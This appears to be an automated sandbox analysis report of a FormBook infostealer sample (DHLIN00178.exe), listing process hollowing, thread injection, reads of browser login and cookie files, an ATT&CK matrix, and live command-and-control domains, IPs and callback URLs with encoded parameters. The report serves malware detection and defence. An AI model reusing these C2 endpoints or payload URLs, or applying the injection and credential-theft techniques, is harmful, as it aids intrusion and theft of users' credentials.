        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3716D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C06179 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C5717A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C5717A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0510D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C30118 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C37128 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C37128 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF13E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFA147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFA147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFA147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8A130 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C332C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C332C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD32C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C232C5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFC2B0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF92AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C082E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C082E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C082E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C082E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E289 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 104.21.8.203 80
        Source: C:\Windows\explorer.exeNetwork Connect: 156.255.170.114 80
        Source: C:\Windows\explorer.exeNetwork Connect: 222.122.213.231 80
        Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80
        Source: C:\Windows\explorer.exeNetwork Connect: 64.190.63.111 80
        Source: C:\Windows\explorer.exeNetwork Connect: 3.9.182.46 80
        Source: C:\Windows\explorer.exeNetwork Connect: 199.192.30.193 80
        Source: C:\Windows\explorer.exeNetwork Connect: 38.163.2.19 80
        Source: C:\Windows\explorer.exeNetwork Connect: 185.53.177.54 80
        Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80
        Source: C:\Windows\explorer.exeNetwork Connect: 154.210.212.94 80
        Source: C:\Windows\explorer.exeNetwork Connect: 103.20.61.209 80
        Source: C:\Windows\explorer.exeNetwork Connect: 85.13.156.177 80
        Source: C:\Windows\explorer.exeNetwork Connect: 164.88.122.250 80
        Source: C:\Windows\explorer.exeNetwork Connect: 81.88.48.71 80
        Source: C:\Windows\explorer.exeNetwork Connect: 173.230.227.171 80
        Sample uses process hollowing technique
        Source: C:\Users\user\Desktop\DHLIN00178.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 6A0000
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\DHLIN00178.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\DHLIN00178.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\DHLIN00178.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\cscript.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF739710000
        Injects a PE file into a foreign processes
        Source: C:\Windows\SysWOW64\cscript.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF739710000 value starts with: 4D5A
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\DHLIN00178.exeThread APC queued: target process: C:\Windows\explorer.exe
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\DHLIN00178.exeThread register set: target process: 4760
        Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 4760
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess created: C:\Users\user\Desktop\DHLIN00178.exe C:\Users\user\Desktop\DHLIN00178.exe
        Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\cscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\cscript.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\cscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\cscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\cscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\cscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Shared Modules        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Deobfuscate/Decode Files or Information        		1
        OS Credential Dumping        		3
        File and Directory Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium4
        Ingress Tool Transfer        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        System Shutdown/Reboot
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Access Token Manipulation        		3
        Obfuscated Files or Information        		LSASS Memory4
        System Information Discovery        		Remote Desktop Protocol1
        Data from Local System        		Exfiltration Over Bluetooth1
        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)711
        Process Injection        		1
        Software Packing        		Security Account Manager121
        Security Software Discovery        		SMB/Windows Admin Shares1
        Email Collection        		Automated Exfiltration4
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
        Timestomp        		NTDS12
        Virtualization/Sandbox Evasion        		Distributed Component Object Model1
        Clipboard Data        		Scheduled Transfer4
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets1
        Process Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Masquerading        		Cached Domain Credentials1
        Application Window Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items12
        Virtualization/Sandbox Evasion        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)711
        Process Injection        		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 829130 Sample: DHLIN00178.exe Startdate: 17/03/2023 Architecture: WINDOWS Score: 100 38 www.verde-amar.info 2->38 40 www.spotcheck.site 2->40 42 24 other IPs or domains 2->42 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus detection for URL or domain 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 3 other signatures 2->66 11 DHLIN00178.exe 1 41 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\...\System.dll, PE32 11->30 dropped 32 C:\Users\user\AppData\Local\...\System.dll, PE32 11->32 dropped 34 C:\Users\user\...\maintenanceservice2.exe, PE32+ 11->34 dropped 36 5 other files (none is malicious) 11->36 dropped 78 Tries to detect Any.run 11->78 15 DHLIN00178.exe 6 11->15         started        signatures6 process7 dnsIp8 50 machupichuturismo.com 162.213.255.18, 49837, 80 NAMECHEAP-NETUS United States 15->50 52 Modifies the context of a thread in another process (thread injection) 15->52 54 Tries to detect Any.run 15->54 56 Maps a DLL or memory area into another process 15->56 58 2 other signatures 15->58 19 explorer.exe 3 1 15->19 injected signatures9 process10 dnsIp11 44 gy.adsfzcvx.com 154.210.212.94, 49891, 49892, 49893 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 19->44 46 www.cmproutdoors.com 156.255.170.114, 49883, 49884, 49885 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 19->46 48 14 other IPs or domains 19->48 68 System process connects to network (likely due to code injection or exploit) 19->68 23 cscript.exe 13 19->23         started        signatures12 process13 signatures14 70 Tries to steal Mail credentials (via file / registry access) 23->70 72 Tries to harvest and steal browser information (history, passwords, etc) 23->72 74 Writes to foreign memory regions 23->74 76 3 other signatures 23->76 26 firefox.exe 23->26         started        process15 process16 28 WerFault.exe 4 26->28         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        DHLIN00178.exe8%ReversingLabsWin32.Trojan.Generic
        DHLIN00178.exe12%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\SolutionExplorerCLI.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\System.Security.Cryptography.X509Certificates.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Mandslinien\Characterizable\Senilitetstegnet\percentile.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\libdatrie-1.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\libpkcs11-helper-1.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\maintenanceservice2.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsj54D2.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        7.2.explorer.exe.14163814.0.unpack100%AviraTR/Patched.Ren.GenDownload File
        1.2.DHLIN00178.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
        5.0.DHLIN00178.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
        9.2.firefox.exe.1e1f3814.0.unpack100%AviraTR/Patched.Ren.GenDownload File
        8.2.cscript.exe.4f33814.3.unpack100%AviraTR/Patched.Ren.GenDownload File
        1.0.DHLIN00178.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File

        Domains

        SourceDetectionScannerLabelLink
        td-ccm-168-233.wixdns.net0%VirustotalBrowse
        popcors.com1%VirustotalBrowse
        www.riverflow.net4%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.sem-jobs.com/i9th/100%Avira URL Cloudmalware
        http://www.cmproutdoors.com/i9th/100%Avira URL Cloudmalware
        http://www.0w3jy.com/i9th/0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://ocsp.thawte.com00%Avira URL Cloudsafe
        http://www.37123.vip/i9th/?eg9JVw4y=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&WsTjx=NuByY100%Avira URL Cloudmalware
        http://machupichuturismo.com/bBbWIWXVMfEPUqiMugc81.bincj0%Avira URL Cloudsafe
        http://www.popcors.com/i9th/100%Avira URL Cloudmalware
        http://www.hhkk143.cfd/i9th/100%Avira URL Cloudmalware
        http://www.popcors.com/i9th/?WsTjx=NuByY&eg9JVw4y=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA==100%Avira URL Cloudmalware
        http://www.0w3jy.com/i9th/?WsTjx=NuByY&eg9JVw4y=uGolGY6UqX3sY/9PLVWwN9J/BTzz+6hffrhecVGN5FjI635Z0j5At+r+BPTklOB2HfIE21jETmQJryl68L/U0+pl2AIDG80kBg==0%Avira URL Cloudsafe
        http://www.riverflow.net/i9th/0%Avira URL Cloudsafe
        http://www.casinoenligne-france.info/i9th/?WsTjx=NuByY&eg9JVw4y=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw==100%Avira URL Cloudmalware
        http://www.hot6s.com/i9th/100%Avira URL Cloudmalware
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://www.sandyhillsagritourism.com/i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw==100%Avira URL Cloudmalware
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        http://www.spotcheck.site/i9th/100%Avira URL Cloudmalware
        http://www.adasoft.info/i9th/100%Avira URL Cloudmalware
        http://www.riverflow.net/i9th/?WsTjx=NuByY&eg9JVw4y=djsn1an+GmzwXFTB/MFsKGQXJOZQhusBpj6p6RqECbOdtpCOv2Kvcnth4kqs1edHWjVNJqZCDFfEwc47KO0/1j4B7gbgnVo+SQ==0%Avira URL Cloudsafe
        http://www.5319ss.com/i9th/0%Avira URL Cloudsafe
        http://www.37123.vip/i9th/100%Avira URL Cloudmalware
        http://www.daon3999.net/i9th/0%Avira URL Cloudsafe
        http://www.verde-amar.info/i9th/0%Avira URL Cloudsafe
        http://www.daon3999.net/i9th/?WsTjx=NuByY&eg9JVw4y=f7i/reR9z/XYtiufs4T2oCglTJHppPIhAuHFUSLntHIlLxYI6+YKRHThES4heztnev1TOQxmA1eDErfm329tx1/Ku+4bHpf60w==0%Avira URL Cloudsafe
        http://www.hhkk143.cfd/i9th/?eg9JVw4y=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&WsTjx=NuByY100%Avira URL Cloudmalware
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        http://www.adasoft.info/i9th/?WsTjx=NuByY&eg9JVw4y=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ==100%Avira URL Cloudmalware
        http://machupichuturismo.com/bBbWIWXVMfEPUqiMugc81.bin0%Avira URL Cloudsafe
        http://www.dinggubd.net/i9th/?WsTjx=NuByY&eg9JVw4y=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw==100%Avira URL Cloudmalware
        http://www.dinggubd.net/i9th/100%Avira URL Cloudmalware
        http://www.verde-amar.info/i9th/?eg9JVw4y=k3d2rpkNYMKNWaTFA3t0FG4YoWbTiA9z8X9PQFaufAL9B597B9+6rAPLCs31mdZA/v+HUWU5or1J0geLcv9LMooOfPEJdI/q3g==&WsTjx=NuByY0%Avira URL Cloudsafe
        http://www.5319ss.com/i9th/?eg9JVw4y=oRug1p2N3M7f21OO0lOBGqE4PfaV2grEv9VY5puRv4+mIhzAnHI5ZAphwtkKSkIVc0m4kQAL+gvPk8R76uitxElzOZBQuGepJQ==&WsTjx=NuByY0%Avira URL Cloudsafe
        https://mozilla.org00%Avira URL Cloudsafe
        http://www.sem-jobs.com/i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByY100%Avira URL Cloudmalware
        http://www.casinoenligne-france.info/i9th/100%Avira URL Cloudmalware
        http://www.spotcheck.site/i9th/?eg9JVw4y=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&WsTjx=NuByY100%Avira URL Cloudmalware
        http://www.cmproutdoors.com/i9th/?eg9JVw4y=lqJURYfuPjuznURrThj0aNiAAsaH1/tf+kf9L6kKBxqjEkH5T6yZpcUSZY6yP89JvXg35e6PTbHFvlwlO73OfbEtyEO8MEspLQ==&WsTjx=NuByY100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        td-ccm-168-233.wixdns.net
        		34.117.168.233
        		truetrueunknown
        popcors.com
        		173.230.227.171
        		truetrueunknown
        www.spotcheck.site
        		199.192.30.193
        		truetrue
          		unknown
          gy.adsfzcvx.com
          		154.210.212.94
          		truetrue
            		unknown
            www.riverflow.net
            		64.190.63.111
            		truetrueunknown
            hk.ygrcw.cn
            		164.88.122.250
            		truetrue
              		unknown
              www.sem-jobs.com
              		85.13.156.177
              		truetrue
                		unknown
                www.dinggubd.net
                		38.163.2.19
                		truetrue
                  		unknown
                  u4tgw7dr.n.funnull35.com
                  		103.20.61.209
                  		truetrue
                    		unknown
                    adasoft.info
                    		81.88.48.71
                    		truetrue
                      		unknown
                      www.hot6s.com
                      		104.21.8.203
                      		truetrue
                        		unknown
                        machupichuturismo.com
                        		162.213.255.18
                        		truefalse
                          		unknown
                          www.hhkk143.cfd
                          		188.114.96.3
                          		truetrue
                            		unknown
                            daon3999.net
                            		222.122.213.231
                            		truetrue
                              		unknown
                              www.casinoenligne-france.info
                              		3.9.182.46
                              		truetrue
                                		unknown
                                www.cmproutdoors.com
                                		156.255.170.114
                                		truetrue
                                  		unknown
                                  www.verde-amar.info
                                  		185.53.177.54
                                  		truetrue
                                    		unknown
